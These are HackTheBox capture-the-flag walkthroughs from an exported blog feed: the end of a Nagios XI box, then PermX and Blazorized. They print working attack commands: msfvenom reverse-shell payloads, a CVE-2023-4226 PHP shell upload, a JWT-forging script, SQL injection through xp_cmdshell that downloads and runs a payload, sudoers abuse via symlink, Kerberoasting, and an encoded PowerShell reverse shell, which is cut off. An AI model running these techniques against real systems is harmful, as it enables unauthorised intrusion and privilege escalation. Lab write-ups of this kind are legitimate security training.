config:\nWe will get a message confirming that this was added if it was successful:\nComing back to Configure \u0026gt; Core Config Manager we can find a Services button. In here we find some active service configs.\nI chose the SSH service listed and changed the Check command option to my reverse shell payload while having a netcat listener running on port 4443:\nAfter clicking the Run Check Command button in the pop up interface, we see that a reverse shell comes back as the user nagios.\nWe are now able to obtain the user flag:\nPrivilege Escalation To start the priv esc enumeration I moved linpeas on to the machine:\n1#KALI 2cd /usr/share/peass/linpeas 3python3 -m http.server 80 4 5#VICTIM 6wget http://10.10.16.31/linpeas.sh Now we will make linpeas executable and run it:\n1chmod +x linpeas.sh 2./linpeas.sh Linpeas Finds Interesting Scripts The output shows a writeable executables are being called by nagios.service and npcd.service.\nWe also see there are scripts available that we can run with sudo permission.\nLooking at the manage_services.sh script we can see that we have the ability to alter the state of services. We will create a malicious nagios file and see if we can get it to run.\nFirst we will check what the file format is so we know what we need to generate with msfvenom.\nWe will now generate a payload to use as the nagios binary.\n1msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.31 LPORT=443 -f elf \u0026gt; nagios We will now host this on a Python HTTP server and transfer it over. A copy of the original is moved to the nagios home directory and wget is used to place our malicious payload.\nCurrently the file is not executable so we fix this with chmod +x nagios:\nNow we will want to start a netcat listener on port 443 and run our malicious binary:\n1#KALI 2nc -nvlp 443 3 4#VICTIM 5sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios We will see the following output when running the script:\nChecking our netcat listener we will see a reverse shell come in for the root user and we can collect the root flag.\n"
  },
  {
    "title":     "HackTheBox - PermX Writeup",
    "permalink": "/posts/permx/",
    "date":      "jan 08 2024",
    "summary":   "CVE-2023-4226 delivers a reverse shell on a Chamilo LMS instance, credentials in a config file grant SSH access as mtz, and a symlink to /etc/sudoers abused via a sudoable setfacl script leads to root.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "PermX is an easy rated Linux machine from week 12 of HackTheBox season 5 \u0026ldquo;Anomalies\u0026rdquo;. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box was a standard easy rated box with a privilege escalation vector that required a bit of thinking. Subdomain enumeration uncovers a Chamilo LMS instance vulnerable to CVE-2023-4226, allowing unauthenticated file upload and a reverse shell as www-data. Linpeas reveals credentials in a Chamilo config file, granting SSH access as mtz. A sudoable script using setfacl is abused via a symbolic link to /etc/sudoers, granting mtz unrestricted sudo and root access.\nScanning and Enumeration First rustscan is run to quickly get a list of open ports. The -g flag is used in this case so that the output is provided as a list that can be easily passed to nmap.\n1rustscan -g -a 10.129.255.122 -ulimit 5000 1[22,80] We can then take these ports and pass them to an nmap scan.\n1nmap -p 22,80 -sC -sV -oA Nmap/rustports 10.129.255.122 1PORT STATE SERVICE VERSION 222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) 3| ssh-hostkey: 4| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA) 5|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519) 680/tcp open http Apache httpd 2.4.52 7|_http-server-header: Apache/2.4.52 (Ubuntu) 8|_http-title: Did not follow redirect to http://permx.htb 9Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel We see a standard set up for an easy rated machine.\nPort 80 - Subdomain Enumeration and Chamilo Looking at the output from nmap, we can see that the website on port 80 is trying to redirect to http://permx.htb, so that we can visit this, we will add it to our /etc/hosts file.\n1echo -e \u0026#39;10.129.255.122\\tpermx.htb\u0026#39; | sudo tee -a /etc/hosts Carrying out subdomain enumeration against the target we find a subdomain lms.permx.htb:\nTo visit this subdomain, we need to add lms.permx.htb as an entry to /etc/hosts, it will will look like this:\n110.129.255.122 permx.htb lms.permx.htb Now we can visit this page and we see a login page for an application called Chamilo.\nExploiting Chamilo - CVE-2023-4226 When looking for an exploit for Chamilo, we can find CVE-2023-4226, this is a remote code execution vulnerability in versions 1.11.24 or under. I could not find any headers giving an exact version, but there were references to Chamilo 1 in the X-Powered-By header and in some meta tags in the page source.\nLooking at the the sources provided on this NVD page, we can see a source for starlabs. Using this blog post, we can follow along and see if this instance of Chamilo is vulnerable.\nFirst we want to check if the following vulnerable directory exists: http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/:\nNow that we know the vulnerable directory exists, we can try placing a reverse shell payload in it. In this case, I used the pentestmonkey PHP reverse shell. We need to ensure the modify the $ip and $port parameters to match those of tun0 and the port we are listening on with netcat.\n1nc -nvlp 4444 We will now want to upload the reverse shell payload into the bigupload directory. We can do this using curl:\n1curl -F \u0026#39;bigUploadFile=@rev-shell.php\u0026#39; \u0026#39;http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported\u0026#39; Now when we go back to our browser, we can should see that rev-shell.php is there:\nNow we can click this file and we get a reverse shell come in through our netcat listener. When running whoami we can see that we have landed as the user www-data.\nReverse Shell Established - Further Enumeration Next we can go and check what users exist on this box by looking in /home.\nSome further enumeration is now required to see if we can get access to another user such as mtz or root. For this enumeration, linpeas was used. First we need to find somewhere thatwww-data can operate out of, looking at the assigned permissions with ls -la we can see that we have rwx permissions there. Now we will use a Python HTTP server to serve linpeas and curl to download it on to the victim host.\n1# Kali 2python -m http.server 80 3 4# Victim 5curl --output linpeas.sh http://10.10.14.211/linpeas.sh With linpeas on the machine, we need to make it executable and then run it.\n1chmod +x linpeas.sh 2./linpeas.sh In the linpeas output, we see that there is a possible password found in a Chamilo configuration file.\nValid Credential for SSH - Collecting User Flag We can try using this for mtz and root to see if we can SSH using this password. We see success with the mtz user.\nNow we can collect the user flag.\nPrivilege Escalation Now that we have acces to a user, we will want to escalate our privileges to root. We will start by looking at the sudo permissions of this user using sudo -l.\nWe see that mtz can run the script acl.sh with sudo. We should investigate this script to see what it is doing.\nChecking acl.sh The following contents were found in the script:\n1#!/bin/bash 2 3if [ \u0026#34;$#\u0026#34; -ne 3 ]; then 4 /usr/bin/echo \u0026#34;Usage: $0 user perm file\u0026#34; 5 exit 1 6fi 7 8user=\u0026#34;$1\u0026#34; 9perm=\u0026#34;$2\u0026#34; 10target=\u0026#34;$3\u0026#34; 11 12if [[ \u0026#34;$target\u0026#34; != /home/mtz/* || \u0026#34;$target\u0026#34; == *..* ]]; then 13 /usr/bin/echo \u0026#34;Access denied.\u0026#34; 14 exit 1 15fi 16 17# Check if the path is a file 18if [ ! -f \u0026#34;$target\u0026#34; ]; then 19 /usr/bin/echo \u0026#34;Target must be a file.\u0026#34; 20 exit 1 21fi 22 23/usr/bin/sudo /usr/bin/setfacl -m u:\u0026#34;$user\u0026#34;:\u0026#34;$perm\u0026#34; \u0026#34;$target\u0026#34; Looking at the content of this script, we can see that it is using the tool setfacl. Having a look at the documentation we can see that the -m file is being used to modify the ACL of a file. Going to the Arch wiki article for ACLs we see this controls permissions for users or groups to disk resources.\nLooking at the first if, we can see that it will not execute if the target file is not in /home/mtz and we are not allowed to provide .. to navigate backwards in the file system.\n1if [[ \u0026#34;$target\u0026#34; != /home/mtz/* || \u0026#34;$target\u0026#34; == *..* ]]; In the second if, we can see that we must be targeting a file due to the -f flag.\n1if [ ! -f \u0026#34;$target\u0026#34; ]; With all of this in mind, we now know that we need to have something in the home directory of our current user that is a file that we can use setfacl on . This is where symbolic links are going to become useful. If you are not familiar with symlinks I would recommend having a look at this video from Read Write Exercise and this man page.\nUsing Symbolic Link to Escalate Privilege Now that we know we want to drop a symlink into the home folder of mtz, we need to think of a file that we can link to that will allow us to elevate our privileges. In this case, I will target the /etc/sudoers file to expand the sudo permissions of the user. To do this we can run the following command:\n1ln -s /etc/sudoers /home/mtz/sudoers_link Now we can run the script to modify our permissions and allow us access to /etc/sudoers:\n1sudo /opt/acl.sh mtz rw /home/mtz/sudoers_link When running ls -la /etc/sudoers we will now see that there is a + symbol next to the permissions which lets us know that a a facl is in use, and running getfacl on /home/mtz/sudoers_link or /etc/sudoers, we will see that the owner is root and mtz has rw permissions.\nNow we can open /etc/sudoers through the symbolic link and modify it.\n1vim /home/mtz/sudoers_link We will want to add the following into the sudoers file to give mtz more privileges.\nWith this in place, we can now escalate our privilege to the root user using sudo su:\n"
  },
  {
    "title":     "HackTheBox - Blazorized Writeup",
    "permalink": "/posts/blazorized/",
    "date":      "jan 07 2024",
    "summary":   "A forged JWT from a decompiled .NET WASM DLL exposes a SQL injection foothold, before chaining WriteSPN Kerberoasting, a malicious login script, and DCSync via Mimikatz to reach Domain Admin.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "Blazorized was a medium rated Windows machine from week 11 of HackTheBox season 5 \u0026ldquo;Anomalies\u0026rdquo;. This rating was later changed to hard when it was retired. In this walkthrough, I will demonstrate how I was able to obtain root access to this machine. This box proved to be quite difficult for me and required very good enumeration.\nBlazorized is a machine running Windows and is functioning as a domain controller. On this machine, we find a Blazor .NET WASM application. We are able to obtain a DLL, use AvaloniaILSpy to read the contents of it, and write a Python script to create a \u0026ldquo;superadmin\u0026rdquo; JWT and access the admin area of the website. From here we will see that we can abuse a SQL injection vulnerability to gain a reverse shell. We then abuse a WriteSPN privilege to pivot to another user using a Kerberoast attack. We will then pivot into another user account by abusing permissions to write a login script that will trigger a reverse shell. Finally, we will use the abuse a DCSync privilege using mimikatz to dump out the administrator\u0026rsquo;s NTLM hash and get a shell as the administrator.\nScanning and Enumeration First, rustscan is run to quickly get a list of open ports. The -g flag is used in this case so that the output is provided as a list that can be easily passed to nmap.\n1rustscan -g -a 10.129.27.141 -ulimit 5000 1[53,80,88,135,139,389,445,464,593,1433,3268,5985,9389,47001,49667,49666,49669,49665,49664,49671,49670,49674,49700,49707,49776,58643] We can then take these ports and pass them to an nmap scan.\n1nmap -p 53,80,88,135,139,389,445,464,593,1433,3268,5985,9389,47001,49667,49666,49669,49665,49664,49671,49670,49674,49700,49707,49776,58643 -sC -sV -oA Nmap/rustports 10.129.27.141 1PORT STATE SERVICE VERSION 253/tcp open domain Simple DNS Plus 380/tcp open http Microsoft IIS httpd 10.0 4|_http-server-header: Microsoft-IIS/10.0 5|_http-title: Did not follow redirect to http://blazorized.htb 688/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-02 19:47:38Z) 7135/tcp open msrpc Microsoft Windows RPC 8139/tcp open netbios-ssn Microsoft Windows netbios-ssn 9389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name) 10445/tcp open microsoft-ds? 11464/tcp open kpasswd5? 12593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 131433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+ 14| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback 15| Not valid before: 2024-07-02T19:40:57 16|_Not valid after: 2054-07-02T19:40:57 17| ms-sql-ntlm-info: 18| 10.129.27.141\\BLAZORIZED: 19| Target_Name: BLAZORIZED 20| NetBIOS_Domain_Name: BLAZORIZED 21| NetBIOS_Computer_Name: DC1 22| DNS_Domain_Name: blazorized.htb 23| DNS_Computer_Name: DC1.blazorized.htb 24| DNS_Tree_Name: blazorized.htb 25|_ Product_Version: 10.0.17763 26| ms-sql-info: 27| 10.129.27.141\\BLAZORIZED: 28| Instance name: BLAZORIZED 29| Version: 30| name: Microsoft SQL Server 2022 RC0+ 31| number: 16.00.1115.00 32| Product: Microsoft SQL Server 2022 33| Service pack level: RC0 34| Post-SP patches applied: true 35| TCP port: 1433 36|_ Clustered: false 37|_ssl-date: 2024-07-02T19:48:42+00:00; +1s from scanner time. 383268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name) 395985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 40|_http-title: Not Found 41|_http-server-header: Microsoft-HTTPAPI/2.0 429389/tcp open mc-nmf .NET Message Framing 4347001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 44|_http-server-header: Microsoft-HTTPAPI/2.0 45|_http-title: Not Found 4649664/tcp open msrpc Microsoft Windows RPC 4749665/tcp open msrpc Microsoft Windows RPC 4849666/tcp open msrpc Microsoft Windows RPC 4949667/tcp open msrpc Microsoft Windows RPC 5049669/tcp open msrpc Microsoft Windows RPC 5149670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 5249671/tcp open msrpc Microsoft Windows RPC 5349674/tcp open msrpc Microsoft Windows RPC 5449700/tcp open msrpc Microsoft Windows RPC 5549707/tcp open msrpc Microsoft Windows RPC 5649776/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1115.00; RC0+ 57| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback 58| Not valid before: 2024-07-02T19:40:57 59|_Not valid after: 2054-07-02T19:40:57 60|_ssl-date: 2024-07-02T19:48:42+00:00; +1s from scanner time. 61| ms-sql-info: 62| 10.129.27.141:49776: 63| Version: 64| name: Microsoft SQL Server 2022 RC0+ 65| number: 16.00.1115.00 66| Product: Microsoft SQL Server 2022 67| Service pack level: RC0 68| Post-SP patches applied: true 69|_ TCP port: 49776 70| ms-sql-ntlm-info: 71| 10.129.27.141:49776: 72| Target_Name: BLAZORIZED 73| NetBIOS_Domain_Name: BLAZORIZED 74| NetBIOS_Computer_Name: DC1 75| DNS_Domain_Name: blazorized.htb 76| DNS_Computer_Name: DC1.blazorized.htb 77| DNS_Tree_Name: blazorized.htb 78|_ Product_Version: 10.0.17763 7958643/tcp open msrpc Microsoft Windows RPC 80Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows 81 82Host script results: 83| smb2-security-mode: 84| 3:1:1: 85|_ Message signing enabled and required 86| smb2-time: 87| date: 2024-07-02T19:48:34 88|_ start_date: N/A From this output we can determine that this is a domain controller due to the presence of services like Kerberos running on port 88 and LDAP on port 389.\nPort 80 - blazorized.htb We see that this web server is running IIS 10 and redirects to blazorized.htb. We will need to add a DNS entry for this to resolve. The following command will write an entry in /etc/hosts for us:\n1echo -e \u0026#39;10.129.27.141\\tblazorized.htb\u0026#39; | sudo tee -a /etc/hosts We see that this site belongs to Mozhar Alhosni which could help us with a username. We see that this site is built using a framework called Blazor when looking at the footer:\n1Built with ❤️ using Blazor WebAssembly Blazor WASM Application I came across this video showing how to get DLLs using postman and decompiling them to get secrets: https://www.youtube.com/watch?v=Xx1eMlscXrQ\nNow that we know that we can obtain DLL files from the site, I wanted to see if there was a way that I could get a collection of every DLL that was being used. Looking on StackOverflow We can get a list of DLLs in use by looking at blazor.boot.json.\nWe can copy the URL out from here and this takes us to the following page: http://blazorized.htb/_framework/blazor.boot.json\nWe can see the DLLs are all being loaded in the same way with the exception of the one under lazyAssembly, we see that there is a file called Blazorized.Helpers.dll.We can get a copy of this by going to http://blazorized.htb/_framework/blazorized.Helpers.dll.\nDoing some research on lazyAssembly, we can find out that it can be used for loading developer created assemblies when they are required. We can see this in action as visiting the site without any cache will only load this DLL when we visit the \u0026ldquo;Check for Updates\u0026rdquo; page. Further reading on lazyAssembly\nDLL Analysis - Finding the Authentication Mechanism To decompile the DLL I used AvaloniaILSpy. We can import it by using File \u0026gt; Open and then navigate to where you are storing the DLL. You will now see Blazorized.Helpers in the menu on the left. Expanding this we can see a class called JWT that has some functions that we should look at.\nInside the DLL, we find some useful variables that include a symmetric key, interesting subdomains, and the admin username. We can also see a function GenerateSuperAdminJWT, the following is that function and the relevant variables are provided:\n1{ 2\tprivate const long EXPIRATION_DURATION_IN_SECONDS = 60L; 3\tprivate static readonly string jwtSymmetricSecurityKey = \u0026#34;8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a\u0026#34;; 4\tprivate static readonly string superAdminEmailClaimValue = \u0026#34;superadmin@blazorized.htb\u0026#34;; 5\tprivate static readonly string postsPermissionsClaimValue = \u0026#34;Posts_Get_All\u0026#34;; 6\tprivate static readonly string categoriesPermissionsClaimValue = \u0026#34;Categories_Get_All\u0026#34;; 7\tprivate static readonly string superAdminRoleClaimValue = \u0026#34;Super_Admin\u0026#34;; 8\tprivate static readonly string issuer = \u0026#34;http://api.blazorized.htb\u0026#34;; 9\tprivate static readonly string apiAudience = \u0026#34;http://api.blazorized.htb\u0026#34;; 10\tprivate static readonly string adminDashboardAudience = \u0026#34;http://admin.blazorized.htb\u0026#34;; 11 12 13\tprivate static SigningCredentials GetSigningCredentials() 14\t{ 15\ttry 16\t{ 17\treturn new SigningCredentials((SecurityKey)new SymmetricSecurityKey(Encoding.get_UTF8().GetBytes(jwtSymmetricSecurityKey)), \u0026#34;HS512\u0026#34;); 18\t} 19\tcatch (System.Exception) 20\t{ 21\tthrow; 22\t} 23\t} 24 25 26\tpublic static string GenerateSuperAdminJWT(long expirationDurationInSeconds = 60L) 27\t{ 28\ttry 29\t{ 30\tList\u0026lt;Claim\u0026gt; obj = new List\u0026lt;Claim\u0026gt;(); 31\tobj.Add(new Claim(\u0026#34;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\u0026#34;, superAdminEmailClaimValue)); 32\tobj.Add(new Claim(\u0026#34;http://schemas.microsoft.com/ws/2008/06/identity/claims/role\u0026#34;, superAdminRoleClaimValue)); 33\tList\u0026lt;Claim\u0026gt; val = obj; 34\tstring text = issuer; 35\tstring text2 = adminDashboardAudience; 36\tSigningCredentials signingCredentials = GetSigningCredentials(); 37\tSystem.DateTime? dateTime = System.DateTime.get_UtcNow().AddSeconds((double)expirationDurationInSeconds); 38\tJwtSecurityToken val2 = new JwtSecurityToken(text, text2, (System.Collections.Generic.IEnumerable\u0026lt;Claim\u0026gt;)val, (System.DateTime?)null, dateTime, signingCredentials); 39\treturn ((SecurityTokenHandler)new JwtSecurityTokenHandler()).WriteToken((SecurityToken)(object)val2); 40\t} 41\tcatch (System.Exception) 42\t{ 43\tthrow; 44\t} 45\t} 46} Now that we know about the subdomains api and admin, we should add them to our /etc/hosts/ file:\n110.129.231.74 blazorized.htb admin.blazorized.htb api.blazorized.htb The JWT token can be found when the API is being updated from the following:\n1http://blazorized.htb/check-updates After clicking it we can see the following header in our Burp HTTP history:\nWe can then inspect the JWT with jwt.io to see that what is being generated is valid:\nGenerating a Superadmin JWT Now we can use a script to generate a valid JWT:\n1import jwt 2import datetime 3 4token_expiry = datetime.datetime.now(datetime.UTC) + datetime.timedelta(seconds=600) 5 6# GenerateSuperAdminJWT 7payload = { 8 \u0026#34;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\u0026#34;: \u0026#34;superadmin@blazorized.htb\u0026#34;, 9 \u0026#34;http://schemas.microsoft.com/ws/2008/06/identity/claims/role\u0026#34;: \u0026#34;Super_Admin\u0026#34;, 10 \u0026#34;exp\u0026#34;: token_expiry, 11 \u0026#34;iss\u0026#34;: \u0026#34;http://api.blazorized.htb\u0026#34;, 12 \u0026#34;aud\u0026#34;: \u0026#34;http://admin.blazorized.htb\u0026#34; 13} 14 15# jwtSymmetricSecurityKey 16jwt_symmetric_security_key = \u0026#34;8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a\u0026#34; 17 18# Encode the JWT token - HS512 encoding taken from GetSigningCredentials 19jwt_token = jwt.encode(payload, jwt_symmetric_security_key, algorithm=\u0026#39;HS512\u0026#39;) 20 21# JavaScript snippet to set JWT token in local storage 22js_code = f\u0026#34;\u0026#34;\u0026#34; 23localStorage.setItem(\u0026#39;jwt\u0026#39;, \u0026#39;{jwt_token}\u0026#39;); 24console.log(\u0026#39;JWT token set in local storage\u0026#39;); 25\u0026#34;\u0026#34;\u0026#34; 26print(\u0026#39;The current JWT will expire at: \u0026#39; + str(token_expiry)) 27print(\u0026#39;JavaScript to set JWT in local storage:\u0026#39;) 28print(js_code) We can then take the presented JavaScript code snippet, visit admin.blazorized.htb and add it to the console. After clicking the run button we will see the following output:\nUpon reloading the page, we will see that we bypass the login mechanism and land in the super admin panel.\nSQL Injection For Reverse shell and User Flag The message mentions being connected directly to the database. This is probably going to lead us into performing a SQLi attack.\nWe can find the injection point by going to Check Duplicate Category Names section and entering the following payload:\n1abc\u0026#39; OR 1=1-- We see the following response:\nWe can see that xp_cmdshell is enabled on the box with a ping payload and use tcpdump to watch tun0 for ICMP traffic:\n1aaa\u0026#39; EXEC master.dbo.xp_cmdshell \u0026#39;ping 10.10.16.37\u0026#39;; -- 1# Kali 2sudo tcpdump -i tun0 icmp We will now drop a reverse shell payload. First we generate the reverse shell:\n1msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.37 LPORT=443 -f exe \u0026gt; rev.exe Now we will serve it with a Python HTTP server and start a listener on our Kali host:\n1Python3 -m http.server 80 2 3nc -nvlp 443 We will now use certutil to download the payload to the victim machine and then we will execute it:\n1aaa\u0026#39; EXEC master.dbo.xp_cmdshell \u0026#39;certutil.exe -urlcache -f http://10.10.16.37/rev.exe C:\\temp\\rev.exe\u0026#39;; -- 2 3aaa\u0026#39; EXEC master.dbo.xp_cmdshell \u0026#39;C:\\temp\\rev.exe\u0026#39;; -- We see that we get a shell back as the user nu_1055:\nWe can now get the user flag:\nPrivilege Escalation WinPeas Enumeration We will start our privilege escalation by transferring winpeas onto the machine using certutil and a Python HTTP server, this is the same method we just used before.\n1# KALI 2cp /usr/share/peass/winpeas/winPEASx64.exe . 3python3 -m http.server 80 4 5# VICTIM 6cd C:\\temp 7certutil.exe -urlcache -f http://10.10.16.37/winPEASx64.exe C:\\temp\\winpeas.exe 8winpeas.exe After running winpeas, we can get a list of usernames that have logged into this machine before:\n1����������͹ Ever logged users 2 NT SERVICE\\SQLTELEMETRY$BLAZORIZED 3 NT SERVICE\\MSSQL$BLAZORIZED 4 BLAZORIZED\\Administrator 5 BLAZORIZED\\SSA_6010 6 BLAZORIZED\\NU_1055 7 BLAZORIZED\\RSA_4810 When looking further into the output, we can see that there is a NetNTLMv2 hash found while enumerating security package credentials:\n1NU_1055::BLAZORIZED:1122334455667788:4b3d889dc2b1aeea147094943ce401f5:010100000000000029503f2f39cfda017282ca42dbb55c0b000000000800300030000000000000000000000000210000fca9a2d27cf2d10aa923114391bf577fec2a9f44a5d47d41586175f0f9e314770a00100000000000000000000000000000000000090000000000000000000000 We can\u0026rsquo;t do anything like pass the hash with NTLMv2 and attempting to crack it with hashcat fails.\nSharpHound - Extracting Domain Info There wasn\u0026rsquo;t much more that I picked out as being interesting from the winpeas output. We can move on to Bloodhound. Download SharpHound.ps1 to the victim machine, I used a Python HTTP server and certutil as shown before. I then ran the following commands:\n1powershell -ep bypass 2. .\\SharpHound.ps1 3Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\\Users\\NU_1055 -OutputPrefix blazorized With the zip generated, we can convert it to base64 to extract it:\n1certutil -encode bloodhound.zip bloodhound.b64 Use something like more to read and remember TRIM THE HEADERS that certutil inserted and only keep the base64 string, this should then be placed in a file on your Kali machine.\n1more bloodhound.b64 We will then need to start the neo4j database and bloodhound to ingest the results and look at them.\n1sudo neo4j \u0026amp; 2sudo bloodhound \u0026amp; We can then convert this back to a zip file on Kali and import it into Bloodhound:\n1base64 -d bloodhound.b64 \u0026gt; bloodhound.zip Bloodhound Enumeration We can find a list of all users to have a look at them:\n1MATCH(m:User) RETURN m Looking at NU_1055, we see WriteSPN access over user RSA_4810 when looking under outbound object control and looking at the first degree object control.\nExploiting WriteSPN for Targeted Kerberoast I couldn\u0026rsquo;t get the WriteSPN to work with the instructions given in BloodHound, I instead used the following for a targeted Kerberoast, note that you will need to use PowerView, so import it the same way we did for Sharphound:\nWe can now take this hash and place it in a text file for cracking. We can run hashcat and it will autodetect a mode of 13100:\n1hashcat spn.hash /usr/share/wordlists/rockyou.txt --force We will see that the hash is cracked:\nGetting a Session as RSA_4810 - Evil-WinRM We can now connect to the box using using evil-winrm:\n1evil-winrm -i blazorized.htb -u rsa_4810 -p \u0026#39;(Ni7856Do9854Ki05Ng0005 #)\u0026#39; Looking at RSA_4810 group memberships, we can see an interesting group called Remote_Support_Administrators: Checking RSA_4810 Write Access We can transfer and run accesschk from the SysInternals tools to see where our current user has write access:\n1certutil.exe -urlcache -f http://10.10.14.105/accesschk64.exe C:\\Users\\RSA_4810\\Documents\\accesschk.exe 2 3.\\accesschk.exe /accepteula -uwds blazorized\\rsa_4810 C:\\Windows The output shows that the user RSA_4810 has read and write access over directories in C:\\Windows\\SYSVOL\\domain\\scripts. 1icacls \\Windows\\SYSVOL\\domain\\scripts\\A32FF3AEAA23 Pivot to SSA_6010 Using ScriptPath Looking at Bloodhound we can see that the user SSA_6010 has a session running on DC1:\nRunning winpeas and checking the Display information about local users section, we can see that SSA_6010 has a very high logon count. This could point to automated logins occurring.\nIf we look at the default value of the script path for SSA_6010, we will see that it is blank. We can change this to point to a reverse shell payload we drop in:\n1Set-ADUser -Identity ssa_6010 -ScriptPath \u0026#39;A32FF3AEAA23\\login.bat\u0026#39; 2 3Get-ADUser -Identity ssa_6010 -Properties ScriptPath | Select-Object Name, ScriptPath We now use mkpsrevshell.py to generate a reverse shell payload, we can then add this to the batch file we created in C:\\Windows\\SYSVOL\\domain\\scripts\\A32FF3AEAA23\n1python3 mkpsrevshell.py 10.10.16.37 443 The output:\n1powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwA3ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEk